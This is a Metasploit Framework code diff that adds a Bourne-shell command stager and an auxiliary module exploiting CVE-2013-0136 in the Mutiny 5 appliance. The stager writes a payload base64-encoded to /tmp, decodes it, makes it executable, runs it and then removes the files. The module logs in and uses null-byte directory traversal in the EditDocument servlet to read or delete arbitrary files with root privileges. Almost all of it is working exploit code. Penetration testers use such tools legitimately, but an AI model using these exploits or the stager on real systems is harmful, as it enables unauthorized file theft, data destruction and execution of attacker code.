sempervictus
diff --git a/‎lib/msf/core/exploit/cmdstager_bourne.rb
Lines changed: 21 additions & 0 deletions b/‎lib/msf/core/exploit/cmdstager_bourne.rb
Lines changed: 21 additions & 0 deletions
diff --git a/‎lib/msf/core/exploit/mixins.rb
Lines changed: 1 addition & 0 deletions b/‎lib/msf/core/exploit/mixins.rb
Lines changed: 1 addition & 0 deletions
diff --git a/‎lib/rex/exploitation/cmdstager.rb
Lines changed: 1 addition & 1 deletion b/‎lib/rex/exploitation/cmdstager.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎lib/rex/exploitation/cmdstager/bourne.rb
Lines changed: 105 additions & 0 deletions b/‎lib/rex/exploitation/cmdstager/bourne.rb
Lines changed: 105 additions & 0 deletions
diff --git a/‎modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
Lines changed: 180 additions & 0 deletions b/‎modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
Lines changed: 180 additions & 0 deletions
@@ -0,0 +1,21 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerBourne
+
+	include Msf::Exploit::CmdStager
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerBourne.new(exe)
+	end
+end
+
+end
@@ -24,6 +24,7 @@
 require 'msf/core/exploit/cmdstager_debug_write'
 require 'msf/core/exploit/cmdstager_debug_asm'
 require 'msf/core/exploit/cmdstager_tftp'
+require 'msf/core/exploit/cmdstager_bourne'
 
 # Protocol
 require 'msf/core/exploit/tcp'
 
@@ -1,8 +1,8 @@
 # -*- coding: binary -*-
-# $Id$
 
 require 'rex/exploitation/cmdstager/base'
 require 'rex/exploitation/cmdstager/vbs'
 require 'rex/exploitation/cmdstager/debug_write'
 require 'rex/exploitation/cmdstager/debug_asm'
 require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'
@@ -0,0 +1,105 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+	end
+
+	def generate(opts = {})
+		opts[:temp] = opts[:temp] || '/tmp/'
+		opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+		opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+		super
+	end
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo -n "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		decoders = [
+			"base64 --decode -",
+			"openssl enc -d -A -base64 -in /dev/stdin",
+			"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+			"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
+		]
+		decoder_cmd = []
+		decoders.each do |cmd|
+			binary = cmd.split(' ')[0]
+			decoder_cmd << "(which #{binary} >&2 && #{cmd})"
+		end
+		decoder_cmd = decoder_cmd.join(" || ")
+		decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin < #{@tempdir}#{@var_encoded}.b64"
+		[ decoder_cmd ]
+	end
+
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+		cmds << "#{@tempdir}#{@var_decoded}.bin"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
+			cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+		end
+
+		super
+	end
+
+	def cmd_concat_operator
+		" ; "
+	end
+
+end
+end
+end
@@ -0,0 +1,180 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'Mutiny 5 Arbitrary File Read and Delete',
+			'Description' => %q{
+					This module exploits the EditDocument servlet from the frontend on the Mutiny 5
+				appliance. The EditDocument servlet provides file operations, such as copy and
+				delete, which are affected by a directory traversal vulnerability. Because of this,
+				any authenticated frontend user can read and delete arbitrary files from the system
+				with root privileges. In order to exploit the vulnerability a valid user (any role)
+				in the web frontend is required. The module has been tested successfully on the
+				Mutiny 5.0-1.07 appliance.
+			},
+			'Author'       =>
+				[
+					'juan vazquez' # Metasploit module and initial discovery
+				],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'CVE', '2013-0136' ],
+					[ 'US-CERT-VU', '701572' ],
+					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
+				],
+			'Actions'     =>
+				[
+					['Read'],
+					['Delete']
+				],
+			'DefaultAction' => 'Read',
+			'DisclosureDate' => 'May 15 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('TARGETURI',[true, 'Path to Mutiny Web Service', '/']),
+				OptString.new('USERNAME', [ true, 'The user to authenticate as', '[email protected]' ]),
+				OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'password' ]),
+				OptString.new('PATH',     [ true, 'The file to read or delete' ]),
+			], self.class)
+	end
+
+	def run
+		@peer = "#{rhost}:#{rport}"
+
+		print_status("#{@peer} - Trying to login")
+		if login
+			print_good("#{@peer} - Login successful")
+		else
+			print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
+			return
+		end
+
+		case action.name
+			when 'Read'
+				read_file(datastore['PATH'])
+			when 'Delete'
+				delete_file(datastore['PATH'])
+		end
+	end
+
+	def read_file(file)
+
+		print_status("#{@peer} - Copying file to Web location...")
+
+		dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
+		res = send_request_cgi(
+		{
+			'uri'           => normalize_uri(target_uri.path, "interface", "EditDocument"),
+			'method'        => 'POST',
+			'cookie'        => "JSESSIONID=#{@session}",
+			'encode_params' => false,
+			'vars_post'     => {
+				'operation' => 'COPY',
+				'paths[]' => "../../../../#{file}%00.txt",
+				'newPath' => "../../../..#{dst_path}"
+			}
+		})
+
+		if res and res.code == 200 and res.body =~ /\{"success":true\}/
+			print_good("#{@peer} - File #{file} copied to #{dst_path} successfully")
+		else
+			print_error("#{@peer} - Failed to copy #{file} to #{dst_path}")
+		end
+
+		print_status("#{@peer} - Retrieving file contents...")
+
+		res = send_request_cgi(
+			{
+				'uri'       => normalize_uri(target_uri.path, "m", ::File.basename(file)),
+				'method'    => 'GET'
+			})
+
+		if res and res.code == 200
+			store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
+			print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
+		else
+			print_error("#{@peer} - Failed to retrieve file")
+		end
+
+		# Cleanup
+		delete_file("#{dst_path}#{::File.basename(file)}")
+	end
+
+	def delete_file(file)
+		print_status("#{@peer} - Deleting file #{file}")
+
+		res = send_request_cgi(
+		{
+			'uri'       => normalize_uri(target_uri.path, "interface", "EditDocument"),
+			'method'    => 'POST',
+			'cookie'    => "JSESSIONID=#{@session}",
+			'vars_post' => {
+				'operation' => 'DELETE',
+				'paths[]' => "../../../../#{file}"
+			}
+		})
+
+		if res and res.code == 200 and res.body =~ /\{"success":true\}/
+			print_good("#{@peer} - File #{file} deleted")
+		else
+			print_error("#{@peer} - Error deleting file #{file}")
+		end
+	end
+
+	def login
+
+		res = send_request_cgi(
+			{
+				'uri'    => normalize_uri(target_uri.path, "interface", "index.do"),
+				'method' => 'GET'
+			})
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+			first_session = $1
+		end
+
+		res = send_request_cgi(
+		{
+			'uri'       => normalize_uri(target_uri.path, "interface", "j_security_check"),
+			'method'    => 'POST',
+			'cookie'    => "JSESSIONID=#{first_session}",
+			'vars_post' => {
+				'j_username' => datastore['USERNAME'],
+				'j_password' => datastore['PASSWORD']
+			}
+		})
+
+		if not res or res.code != 302 or res.headers['Location'] !~ /interface\/index.do/
+			return false
+		end
+
+		res = send_request_cgi(
+		{
+			'uri'    => normalize_uri(target_uri.path, "interface", "index.do"),
+			'method' => 'GET',
+			'cookie' => "JSESSIONID=#{first_session}"
+		})
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+			@session = $1
+			return true
+		end
+
+		return false
+	end
+
+end